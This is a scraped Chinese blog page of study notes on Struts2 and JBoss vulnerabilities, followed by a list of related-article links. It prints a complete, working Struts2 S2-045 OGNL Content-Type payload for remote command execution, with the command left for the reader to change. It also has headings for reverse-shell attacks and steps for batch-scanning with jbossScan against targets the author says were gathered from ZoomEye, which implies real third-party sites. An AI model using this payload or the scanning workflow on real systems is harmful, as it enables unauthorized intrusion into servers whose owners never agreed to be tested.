常见漏洞之 struts2+ jboss
数据来源
本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。
01 Struts2相关介绍
》Struts2概述
》Struts2历史漏洞(1)
》Struts2历史漏洞(2)
》Struts2历史漏洞(3)
》Struts2历史漏洞(4)
》Struts2历史漏洞(5)
》Struts2历史漏洞(6)
》Struts2历史漏洞(2019)
02 Strut2 识别与漏洞利用
》Struts2框架识别(1)
》Struts2框架识别(2)
》Struts2漏洞验证
Struts2漏洞检查工具2018
struts2综合漏洞扫描工具_struts2漏洞检测工具_虚无-缥缈的博客-CSDN博客
》Struts2-045漏洞介绍
》Struts2-045漏洞危害
》Struts2-045漏洞利用(执行命令)
随意上传一个文件井抓包,修改 Content-type为以下的内容
Content-Type:"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"#cmd='whoami' 可以改成其他系统命令,如:ipconfig、dir、......
》Struts2-045漏洞利用(反弹shell)
03 Jboss相关介绍
》Jboss概述
》Jboss历史漏洞(访问控制不严导致的漏洞)
》Jboss历史漏洞(反序列化漏洞)
04 Jboss识别与漏洞利用
》Jboss组件识别
访问网站的8080端口出现类似下面的页面就是使用了Jboss组件
》Jbos漏洞检测(批量)
GitHub - GGyao/jbossScan: 扫描jboss常见漏洞路径是否存在。
使用示例:
1)先把脚本代码从github上拉下来
2)把要扫描的目标url写进target.txt文件中,一行一个
这个目标网站是从钟馗之眼找的
3)扫描漏洞
这个使用python3运行脚本,kali上自带,windows系统要自行安装
我的python运行文件的名称就是python所以这个我用python执行命令,也可以更改文件名为python3然后就可以使用python3执行命令
python jbossScan.py
》CVE-2017-12149漏洞检测
/invoker/readonly
CVE-2017-12149漏洞概述
》CVE-2017-12149漏洞利用(反弹shell)
GitHub - joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
常见漏洞之 struts2+ jboss相关推荐
- 【Web安全笔记】之【4.0 常见漏洞攻防】
文章目录 4.0 常见漏洞攻防 4.1 SQL注入 4.1.1 注入分类 1. 简介 2. 按技巧分类 1). 盲注 2). 报错注入 3). 堆叠注入 3. 按获取数据的方式分类 1). inban ...
- 常见漏洞验证测试方法
收集整理了一些常见漏洞的验证测试方式,以及参考链接.有补充再加 序号 漏洞名称 验证方式 1 跨站脚本 1. GET方式跨站脚本: 1) 在输入的参数后逐条添加以下语句,以第一条为例,输入http:/ ...
- php进攻教程,如何对PHP程序中的常见漏洞进行攻击(下)_php基
如何对PHP程序中的常见漏洞进行攻击(下)_php基 发布时间:2016-06-17 来源: 点击: 次 如何对PHP程序中的常见漏洞进行攻击(下) 翻译:analysist(分析家) 来源:http ...
- android WebView详解,常见漏洞详解和安全源码(下)
上篇博客主要分析了 WebView 的详细使用,这篇来分析 WebView 的常见漏洞和使用的坑. 上篇:android WebView详解,常见漏洞详解和安全源码(上) 转载请注明出处:http ...
- android WebView详解,常见漏洞详解和安全源码(上)
这篇博客主要来介绍 WebView 的相关使用方法,常见的几个漏洞,开发中可能遇到的坑和最后解决相应漏洞的源码,以及针对该源码的解析. 由于博客内容长度,这次将分为上下两篇,上篇详解 WebView ...
- 如何对PHP程序中的常见漏洞进行攻击(上)
如何对PHP程序中的常见漏洞进行攻击(上) 创建时间:2001-07-17 文章属性:翻译 文章来源:http://www.china4lert.org 文章提交:analysist (analysi ...
- Android常见漏洞
Android常见漏洞 漏洞名称: Log敏感信息泄露 漏洞描述: 程序运行期间打印了用户的敏感信息,造成泄露 修改建议: 建议禁止隐私信息的log 漏洞名称: web https校验错误忽略漏洞 漏 ...
- 什么是CVE?常见漏洞和暴露列表概述
常见漏洞和暴露(Common Vulnerability and Exposures,简称CVE)收集了已知的网络安全漏洞和暴露,以帮助您更好地保护您的嵌入式软件. 在这里,我们会阐释什么是CVE,C ...
- IIS 服务器常见漏洞
IIS 服务器常见漏洞 文件解析漏洞 1.目录解析漏洞 2.文件名解析漏洞 3.畸形解析漏洞 IIS 短文件漏洞 PUT 任意文件写入 IIS是Internet Information Service ...
最新文章
- python界面开发工具-python图形界面开发用什么
- Numpy、Scipy、matplotlib、scikit-learn等常用学习链接
- angular 动态取到的html片段 在页面的展示
- CF1553H-XOR and Distance【dp】
- 为什么我放弃饿了么产品总监,却要从事自由职业?
- MCITP第十二课——642课件2新知识点笔记
- 全面战争:战锤II-概念艺术设计
- python数据可视化柱状图_python数据可视化示例柱状图
- 25 种代码坏味道总结+优化示例
- spring 事务配置
- Swiper 在vue中的使用,loop=true获取真实index,数据更新刷新初始化swiper
- python 实现死亡之ping
- 网页直接加QQ群/QQ好友
- linux调试符号表,strip去除目标文件中符号表、调试符号表信息
- 华为设备,什么是MAC地址漂移
- 1+x 云计算平台运维与开发测试题
- NO.3 创建一个图片,并在图片上画线插入文字等
- 翻译小窍门-谢谢你勾引我老公
- google的RateLimiter限流器的使用
- 关于海神阁阁主真实身份的推测
热门文章
- [附源码]计算机毕业设计宁财二手物品交易网站Springboot程序
- Linux面试题汇总答案
- Blinker控制esp8266 01s实现远程控制继电器开关代码
- matlab park clark,[转载]park,clark和ipark浅析
- OSChina 周五乱弹 ——做宇宙最低调的程序员.
- 中国式焦虑,都是比出来的!
- GroupDocs.Conversion Crack,强大 .NET 文档转换组件
- 139.深度学习分布式计算框架-2
- 北京师范大学计算机考研难嘛,北京师范大学考研难吗?一般要什么水平才可以进入?...
- 哎!无奈,遇到DDos到底应该怎么办?阿里云将你扔进黑洞;腾讯云清退你!